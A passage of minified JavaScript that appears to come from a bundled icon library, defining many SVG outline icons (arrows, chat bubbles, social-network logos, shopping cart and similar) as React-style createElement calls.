24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 10v1.5m7-1.5v1.5M9 17c.778-.839 3.267-2.516 7-1.845"})),correct_save_check_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 12c0 5.523-4.477 10-10 10S2 17.523 2 12 6.477 2 12 2s10 4.477 10 10Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m8 12.5 2.5 2.5L16 9"})),correct_save_check_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m4.5 13 5 5 10-12"})),cross_close_x_minimize_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m8 8 8 8m0-8-8 8"})),cross_x_close_minimize_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"m6 6 6 6m0 0 6 6m-6-6 6-6m-6 6-6 6"})),desktop_monitor_computer_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 3H4a2 2 0 0 0-2 2v10a2 2 0 0 0 2 2h16a2 2 0 0 0 2-2V5a2 2 0 0 0-2-2ZM8 21h8m-4-4v4m0-7.5h.01"})),dot_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 2C6.477 2 2 6.477 2 12s4.477 10 10 10 10-4.477 10-10S17.523 2 12 2Z",clipRule:"evenodd"})),download_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 15v4c0 1.1.9 2 2 2h14a2 2 0 0 0 2-2v-4m-4-6-5 5-5-5m5 3.8V2.5"})),download_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7.822 8.067A5 5 0 0 0 6 17.9m12.633-5.658A7 7 0 1 0 5.248 8.147M19 9.756a4.502 4.502 0 0 1-.195 8.552M12 13v8m0 0-2.5-2.5M12 21l2.5-2.5"})),facebook_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M16.5 8H14a2 2 0 0 0-2 2v11m-2-7h5"})),google_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"m21.882 10.459-.103-.428h-9.485v3.938h5.667c-.588 2.741-3.318 4.184-5.549 4.184-1.623 0-3.333-.67-4.465-1.746a6.25 6.25 0 0 1-1.4-2.021 6.152 6.152 0 0 1-.502-2.393c0-1.66.76-3.318 1.865-4.41 1.106-1.091 2.776-1.702 4.437-1.702 1.902 0 3.264.99 3.774 1.442l2.853-2.784C18.137 3.818 15.838 2 12.254 2 9.49 2 6.84 3.039 4.903 4.933 2.99 6.8 2 9.497 2 12s.937 5.066 2.79 6.946C6.77 20.952 9.574 22 12.46 22c2.627 0 5.117-1.01 6.892-2.842 1.745-1.803 2.647-4.3 2.647-6.915 0-1.101-.113-1.755-.118-1.784Z"})),growth_increase_up_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m20.2 7.8-7.7 7.7-4-4-5.7 5.7"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15 7h6v6"})),hamicon_5_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 13a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2ZM5 6a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2ZM5 20a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Z"})),hamicon_6_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 13a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm0-7a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm0 14a1 1 0 1 0 0-2 1 1 0 0 0 0 2Z"})),happy_emoji_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 8v1.5m7-1.5v1.5M12 18a5 5 0 0 0 5-5H7a5 5 0 0 0 5 5Z"})),heart_love_wishlist_favourite_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m4.098 13.848 7.52 7.519a.542.542 0 0 0 .765 0l7.52-7.52a5.678 5.678 0 0 0 0-8.028 5.047 5.047 0 0 0-7.138 0l-.711.71a.076.076 0 0 1-.107 0l-.711-.71a5.047 5.047 0 0 0-7.138 0 5.678 5.678 0 0 0 0 8.029Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16.334 7.48c.553 0 1.107.21 1.53.633.547.548.78 1.292.695 2.006"})),hemicon_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M4 5h16M4 12h11.5M4 19h16"})),hemicon_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M4 5h16M4 12h16M4 19h16"})),hemicon_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M4 5h16M4 12h11.5M4 19h8"})),hidden_hide_invisible_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M17.862 5.999c-1.61-1.148-3.576-2-5.86-2-7 0-11 8-11 8s1.764 3.529 5 5.899m3 1.596a9.213 9.213 0 0 0 3 .505c7 0 11-8 11-8s-.867-1.734-2.5-3.587"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14 9.764A3 3 0 0 0 9.764 14m5.21-1.601a3.002 3.002 0 0 1-2.59 2.577M3.6 20.4 20.4 3.6"})),home_house_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3.671 9.403 7-6.222a2 2 0 0 1 2.658 0l7 6.222A2 2 0 0 1 21 10.898V19a2 2 0 0 1-2 2h-3.5a1 1 0 0 1-1-1v-5a1 1 0 0 0-1-1h-3a1 1 0 0 0-1 1v5a1 1 0 0 1-1 1H5a2 2 0 0 1-2-2v-8.102a2 2 0 0 1 .671-1.495Z"})),hourglass_timer_time_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 2v4.93a2 2 0 0 0 .89 1.664l4.555 3.036a1 1 0 0 0 1.11 0l4.554-3.036A2 2 0 0 0 18 6.93V2M6 22v-4.93a2 2 0 0 1 .89-1.664l4.555-3.036a1 1 0 0 1 1.11 0l4.554 3.036A2 2 0 0 1 18 17.07V22"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 2h16M4 22h16M9.5 19.5h5M11 17h2"})),instagram_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,a.createElement)("circle",{cx:"12",cy:"12",r:"4",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"2",d:"M17 7h.01"})),laptop_computer_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3.5 6a2 2 0 0 1 2-2h13a2 2 0 0 1 2 2v10h-17V6Zm7 1h3M2 16h20v2a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2v-2Z"})),left_align_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M3 3h18M3 21h8m-8-6h18M3 9h8"})),left_triangle_angle_arrow_backward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6.067 12.8a1 1 0 0 1 0-1.6l9.333-7A1 1 0 0 1 17 5v14a1 1 0 0 1-1.6.8l-9.333-7Z"})),linkedin_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M7.75 10.25v6"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"2",d:"M7.75 7.75h.01"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M11.25 10.25v6m5 0v-3.5a2.5 2.5 0 0 0-5 0"})),link_chains_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m14.011 17.028-2.514 2.514a4.977 4.977 0 1 1-7.04-7.04L6.973 9.99M9.99 6.973l2.514-2.514a4.978 4.978 0 1 1 7.04 7.04l-2.515 2.513M9.5 14.5l5-5"})),location_gps_map_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"10",r:"3",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 10.205C20 17.385 12 22 12 22s-8-4.615-8-11.795C4 5.674 7.582 2 12 2s8 3.674 8 8.205Z"})),long_arrow_up_top_increase_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 21V3m0 0L6 9m6-6 6 6"})),mail_email_messege_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 6a2 2 0 0 1 2-2h16a2 2 0 0 1 2 2v12a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2V6Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m6 8 4.8 3.6a2 2 0 0 0 2.4 0L18 8"})),media_document_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 21h14a2 2 0 0 0 2-2V8.828a2 2 0 0 0-.586-1.414l-3.828-3.828A2 2 0 0 0 15.172 3H5a2 2 0 0 0-2 2v14a2 2 0 0 0 2 2ZM8 9h4m-4 3h8m-8 3h6"})),messege_comment_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 7v15l5-4h13a2 2 0 0 0 2-2V7a2 2 0 0 0-2-2H4a2 2 0 0 0-2 2Zm7 3h4m-4 3h6"})),messege_comment_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 4H4a2 2 0 0 0-2 2v9a2 2 0 0 0 2 2h4.5v4l5-4H20a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2ZM9 9h4m-4 3h6"})),messege_comment_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 4H4a2 2 0 0 0-2 2v9a2 2 0 0 0 2 2h4.5v4l5-4H20a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2ZM8 11v-1m4 1v-1m4 1v-1"})),messege_comment_4_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 4H4a2 2 0 0 0-2 2v9a2 2 0 0 0 2 2h4.5v4l5-4H20a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2Z"})),messege_comment_5_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 12a9 9 0 1 1 9 9H3v-9Zm6-1.5h6m-6 3h6"})),messege_comment_6_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16 16a4 4 0 0 1-4 4H2v-6a4 4 0 0 1 4-4"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 9a5 5 0 0 1 5-5h6a5 5 0 0 1 5 5v7H11a5 5 0 0 1-5-5V9Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 8.5h4m-4 3h6"})),messege_comment_7_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 20c5.523 0 10-3.806 10-8.5S17.523 3 12 3 2 6.806 2 11.5c0 2.78 1.571 5.25 4 6.8v3.2l3.211-1.835A11.66 11.66 0 0 0 12 20Zm-3-9.5h6m-5 3h4"})),messege_comment_8_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14.5 18.703c-4.142 0-7.5-3.292-7.5-7.352C7 7.291 10.358 4 14.5 4c4.142 0 7.5 3.291 7.5 7.351 0 2.405-1.178 4.54-3 5.882V20l-2.408-1.587a7.645 7.645 0 0 1-2.092.29Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.352 5.55A7.131 7.131 0 0 0 8.5 5.5C4.91 5.5 2 8.174 2 11.473c0 1.954 1.021 3.69 2.6 4.779V18.5l2.087-1.29a7.04 7.04 0 0 0 2.813.166c.169-.024.336-.054.5-.09"})),messenger_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 22c5.523 0 10-4.477 10-10S17.523 2 12 2 2 6.477 2 12c0 1.834.494 3.553 1.355 5.03L2 22l4.818-1.445A9.954 9.954 0 0 0 12 22Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m7 13.75 3-3 3.5 3 3.5-3.5"})),microsoft_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Zm9-2v18m-9-9h18"})),middle_align_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M3 3h18M8 21h8M3 15h18M8 9h8"})),mobile_smartphone_phone_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M17 2H7a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h10a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2Zm-6.5 3h3"})),pause_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h2.5a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Zm11.5 0a2 2 0 0 1 2-2H19a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2h-2.5a2 2 0 0 1-2-2V5Z"})),pinterest_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 11 8 21m1.818-4.5A5 5 0 1 0 7.416 14"}),(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"})),play_media_video_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 2c5.522 0 10 4.477 10 10s-4.478 10-10 10C6.477 22 2 17.523 2 12S6.477 2 12 2Z",clipRule:"evenodd"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m16 12-6-4v8l6-4Z"})),price_tag_label_category_sale_discount_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12.328 2.5H20.5a1 1 0 0 1 1 1v8.172a2 2 0 0 1-.586 1.414l-8 8a2 2 0 0 1-2.829 0l-7.171-7.172a2 2 0 0 1 0-2.828l8-8a2 2 0 0 1 1.414-.586Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M18 7.5a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m8 13 3 3"})),price_tag_offer_sale_coupon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15.5 5.5h-3.672a2 2 0 0 0-1.414.586l-6.5 6.5a2 2 0 0 0 0 2.828l6.171 6.172a2 2 0 0 0 2.829 0l6.5-6.5A2 2 0 0 0 20 13.672V6.5a1 1 0 0 0-1-1h-.5M8 14.5l3 3m-.5-4.5 2 2"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16 9c4.5-2.5 1.655-7.99-2.766-6.817-2.752.73-5.916 1.27-9.234 0"})),reddit_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M12 9c-4.97 0-9 2.91-9 6.5S7.03 22 12 22s9-2.91 9-6.5S16.97 9 12 9Zm0 0V6a2 2 0 0 1 2-2h3m3.506 9.37a2.25 2.25 0 1 0-2.856-2.93M17 4a2 2 0 1 0 4 0 2 2 0 0 0-4 0ZM3.494 13.37a2.25 2.25 0 1 1 2.856-2.93"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M8.5 16.75c1.5 1.5 5.5 1.5 7 0M15 13h.01M9 13h.01"})),refresh_reset_cycle_loop_infinity_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M21 12a9 9 0 0 1-17 4.127M3 12a9 9 0 0 1 17-4.127M20 3v5h-5M4 21v-5h5"})),restriction_no_stop_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 19 19 5"})),right_align_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M3 3h18m-8 18h8M3 15h18m-8-6h8"})),right_triangle_angle_play_arrow_forward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M17.933 12.8a1 1 0 0 0 0-1.6L8.6 4.2A1 1 0 0 0 7 5v14a1 1 0 0 0 1.6.8l9.333-7Z"})),search_magnify_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 19a8 8 0 1 0 0-16 8 8 0 0 0 0 16Zm10 2-4.35-4.35"})),settings_tool_function_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.55 2.778A1 1 0 0 1 10.523 2h2.953a1 1 0 0 1 .975.778l.355 1.562a2 2 0 0 0 2.538 1.468l1.627-.5a1 1 0 0 1 1.155.447l1.456 2.464a1 1 0 0 1-.193 1.253l-1.16 1.04a2 2 0 0 0 0 2.978l1.16 1.038a1 1 0 0 1 .193 1.254l-1.456 2.464a1 1 0 0 1-1.155.447l-1.627-.5a2 2 0 0 0-2.538 1.468l-.355 1.56a1 1 0 0 1-.976.779h-2.952a1 1 0 0 1-.975-.778l-.355-1.562a2 2 0 0 0-2.538-1.468l-1.628.5a1 1 0 0 1-1.154-.446l-1.456-2.464a1 1 0 0 1 .193-1.254l1.16-1.038a2 2 0 0 0 0-2.979L2.61 9.472a1 1 0 0 1-.194-1.253l1.456-2.464a1 1 0 0 1 1.155-.447l1.628.5A2 2 0 0 0 9.194 4.34l.355-1.562Z"}),(0,a.createElement)("circle",{cx:"12",cy:"12",r:"3",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"})),share_social_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.968 10.591a3.15 3.15 0 1 0 0 2.818m0-2.818c.212.424.332.902.332 1.409s-.12.985-.332 1.409m0-2.818 7.013-3.507M8.968 13.41l7.013 3.507m0-9.832a2.7 2.7 0 1 0 4.637-2.769 2.7 2.7 0 0 0-4.637 2.77Zm0 9.832a2.7 2.7 0 1 0 4.637 2.769 2.7 2.7 0 0 0-4.637-2.77Z"})),shopping_cart_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 